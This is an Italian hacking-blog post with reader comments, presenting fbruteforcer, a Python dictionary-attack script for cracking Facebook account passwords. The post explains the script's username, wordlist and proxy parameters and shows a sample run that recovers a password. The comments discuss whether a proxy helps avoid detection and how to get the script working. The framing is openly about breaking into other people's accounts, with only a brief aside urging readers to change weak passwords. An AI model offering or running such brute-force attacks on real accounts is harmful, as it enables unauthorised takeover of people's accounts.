Ricevi gli aggiornamenti nella tua email:




set
3rd

Craccare Facebook con fbruteforcer

Autore: Angelo Righi | Hacking

Se non si riesce a craccare un account di Facebook sfruttando un bug, attuando qualche trucco di social-engineering o sniffando la passdword in una rete locale, non rimane che un’ultima carta da giocare: la cara vecchia forza bruta.

Dallo stesso autore di wpbruteforcer, script per recuperare la password di un account WordPress tramite dictionary-attack, eccovi oggi un script, sempre scritto in python, per attaccare un account Facebook.

Per i dettagli sull’installazione (anche questo script utilizza il modulo mechanize) vi rimando all’altro articolo.

I parametri obbligatori di questo script sono:

-u utente da attaccare (va bene anche l’indirizzo email)
-w nome del file contenente il dizionario

Inoltre è possibile utilizzare un proxy:

-p specifica l’indirizzo (e la porta) del proxy nel formato indirizzo:porta
-k eventuale nome utente del proxy
-i eventuale password per accedere al proxy

Ecco l’attacco (finto) al mio account, eseguito da Windows. Ho usato un dizionario di quattro parole (in uno scenario reale conviene usarne uno un po’ più corposo…):

C:\PH>fbrutecorcer.py -u angelorighi  -w dictionary.txt
 
Programmer : gunslinger_
Version       : 1.0
 
[*] Starting attack at 23:39:32
[*] Account for bruteforcing angelorighi
[*] Loaded : 4 words
[*] Bruteforcing, please wait...
[*] Trying letmein...

password trovata al terzo tentativo.

[*] Logging in success...
[*] Username : angelorighi
[*] Password : letmein

Tutto facile quindi? Naturalmente no. Se però avete il dubbio che la vostra password possa facilmente essere inserita in un dizionario di parole comuni correte a cambiarla.

Lo script lo potete trovare qui


Altri articoli:

L’Impresa dei Mille
Il riferimento alla leggendaria impresa garibaldina, evento risorgimentale cruciale, mi sembra d’obbligo...

PillolHacking.Net: I Migliori Articoli del 2010
Quello che si conclude è l’anno di Wikileaks e di Stuxnet, del controverso Assange e dell’esplosione...

PHN3W5 20110724-20110731
PHN3W5, notizie relative al mondo dell’hacking, della sicurezza e della cyberwarfare dal 24-07-2011...

Non Sempre le Cose che Sembrano Complicate Sono Complicate
Come ogni ladro che si rispetti sa, ammesso che un ladro possa essere rispettato, se la porta principale...



Se vuoi essere sicuro di ricevere tutti gli aggiornamenti di PillolHacking gratuitamente nella tua email, iscriviti inserendo il tuo indirizzo qui sotto:


Learn How To Hack

23 responses. Wanna say something?

  1. Danilo
    set 3, 2010 at 14:59:26
    #1

    Nei parametri sicuro che l’indirizzo dell’account non sia -u??

  2. Angelo Righi
    set 3, 2010 at 15:16:25
    #2

    si, chiaro è -u! grazie per la segnalazione ;)

  3. TroUblE
    set 3, 2010 at 16:25:57
    #3

    Il rischio di essere beccati senza usare proxy è alto o si può fare?

  4. Angelo Righi
    set 4, 2010 at 15:32:25
    #4

    @TroUblE: secondo me è alto anche col proxy

  5. TroUblE
    set 4, 2010 at 18:34:00
    #5

    Eh si lo temevo.. e allora non lo userà nessuno :D
    Grazie

  6. Angelo Righi
    set 4, 2010 at 19:00:32
    #6

    no,no, non lo userà nessuno ;)

  7. Z-bho
    set 5, 2010 at 17:35:58
    #7

    Ma se ci fossero 2000 “angelorighi”? E poi perché tutto attaccato e in minuscolo?

  8. Angelo Righi
    set 5, 2010 at 18:22:15
    #8

    no, di angelorighi ce n’è uno, in quanto si tratta di un id univoco, alias dell’id 637914484:
    http://www.facebook.com/profile.php?id=637914484
    http://www.facebook.com/angelorighi
    possono esserci altri utenti che si chiamano Angelo Righi, ma hanno id e alias diversi

  9. barbyboy
    set 15, 2010 at 17:32:48
    #9

    io per scrupolo l’ho provato ma, si blocca dopo un pò e mi segnala questo errore

    [*] Trying aakkosillansa$\… Traceback (most recent call las t):
    File “fbruteforcer.py”, line 243, in
    main()
    File “fbruteforcer.py”, line 237, in main
    releaser()
    File “fbruteforcer.py”, line 175, in releaser
    bruteforce(word.replace(“\n”,”"))
    File “fbruteforcer.py”, line 148, in bruteforce
    br.submit()
    File “build/bdist.linux-i686/egg/mechanize/_mechanize.py”, line 541, in submit
    File “build/bdist.linux-i686/egg/mechanize/_mechanize.py”, line 203, in open
    File “build/bdist.linux-i686/egg/mechanize/_mechanize.py”, line 255, in _mech_ open
    mechanize._response.httperror_seek_wrapper: HTTP Error 500: Internal Server Erro

  10. francesco
    set 15, 2010 at 23:53:30
    #10

    Devi sistemare il file py
    in python il codice deve essere allineato
    correggi le linee che ti dice e vedi che va

    a me funziona

    ma non ho ben chiaro dove appare la password giusta

  11. francesco
    set 15, 2010 at 23:54:55
    #11

    dimenticavo io uso linux (ubuntu) da riga di comando

  12. Erriko
    set 16, 2010 at 16:39:38
    #12

    Ma FB non ha un numero massimo di tentativi possibili? Inoltre accedendo da un proxy, questo potrebbe essere riconosciuto come una postazione “insolita” (mi è capitato utilizzando una rete vpn svizzera) e facebook passa a bloccare l’accesso richiedendo dati secondo loro personali, tipo la data di compleanno :P (ridicolo)
    Ultimamente un mio amico ha avuto esperienza di un sistema di controllo più raffinato, gli veniva chiesto di riconoscere le persone presenti in una foto (erano state taggate ovviamente) e di immetere il loro nome. Nel suo caso però si trattava di un account promozionale di un’associazione. Su 2000 amici ne conosceva si e no un 100naio, gli altri erano appunto simpatizzanti dell’associazione sparsi per l’Italia. Per cui le foto degli amici erano foto di persone che non conosceva, ergo è rimasto fuori :D (gliel’avevo detto di fare una fan page invece che un profilo!)

  13. barbyboy
    set 17, 2010 at 19:31:46
    #13

    francesco, al primo tentativo però ha funzionato con un vocabolario di sole 4 parole tra cui la mia pass.
    Io ho subito pensato a quello che ha detto Enrico che c’è il numero massimo di tentativi, però se così fosse il brute force cesserebbe di esistere perché ormai dappertutto c’è il numero massimo di tentativi

  14. Richard
    ott 8, 2010 at 15:58:51
    #14

    E’ come prendere a picconate la porta del caveau di una banca

  15. simone
    ott 15, 2010 at 21:33:10
    #15

    scusate, ma bisogna salvare il documento in estensione .py oppure … mi dite per cortesia come si fa?

  16. Andrew
    gen 5, 2011 at 23:52:56
    #16

    Ciao a tutti, anke io ero interessato a questo script, però girovagando per il web non ho ben chiare alcune cose: 1) come si istalla il modulo mechanize una volta istallato python 2) come và inserita la sintassi visto che mi dà sempre errore (copiandola semplicemente) e 3) dove si devono trovare il file .py e il .txt del dizionario? Grazie a chiunque sappia illuminarmi :)

  17. Giuseppe
    gen 27, 2011 at 18:11:36
    #17

    Scusa, ho provato con il mio account inserendo nel txt la password insieme ad altre inventate a caso. Però mi dà errore “syntax” mi spieghi il motivo? Ho provato la versione 3.x e 2.7. Ho installato la versione 0.2.4 di mechanize dal setup, e non cambia niente.

  18. Gaetano
    giu 23, 2011 at 16:03:22
    #18

    Caro Angelo,

    se posso, vorrei segnalarti un simpatico hack di cui potresti parlare sul tuo blog..i tuoi articoli sono sempre impeccabili! ;)

    http://www.hackerstribe.com/2011/ecco-il-primo-facebook-notifier/

    Ciao continua così!

  19. Angelo Righi
    giu 23, 2011 at 23:40:48
    #19

    Ciao Gaetano! Si l’avevo visto, molto, molto simpatico ;) Tempo permettendo butto giù un articolo. Intanto saluti e complimenti per sito e notifier :D

  20. Stella
    ago 22, 2011 at 22:05:07
    #20

    Ragazzi!!! Come si usa???? Potete spiegarmi?? :/

3 Trackback(s)

  1. set 3, 2010: Facebook Login » Craccare Facebook con fbruteforcer | PillolHacking.Net
  2. set 4, 2010: upnews.it
  3. set 5, 2010: Crackare Facebook mediante brute force. | Lega Nerd

Post a Comment

Learn How To Hack